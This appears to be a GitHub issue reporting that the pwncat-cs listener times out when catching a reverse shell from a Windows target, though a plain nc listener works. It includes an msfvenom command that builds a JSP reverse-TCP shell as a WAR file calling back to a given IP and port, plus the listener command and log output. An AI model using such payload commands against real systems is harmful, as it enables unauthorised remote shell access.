-
Notifications
You must be signed in to change notification settings - Fork 287
Description
I'm trying to get shell from windows system for the below exploit. But it seems like pwncat-cs issue, same is working well with nc listenere. I tried using different attack machines like Kali as well, but no luck. I tried sending nc to pwncat, still same issue. Not sure if it's target platform issue. Worth to look into it. Thank you.
MSF Venom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=4444 -f war > reverse.war
pwncat-cs -m windows -lp 4444
[08:08:53] Welcome to pwncat 🐈! main.py:164
[08:09:26] received connection from 127.0.0.1:59726 bind.py:84
[08:09:56] connection failed: channel receive timed out: b''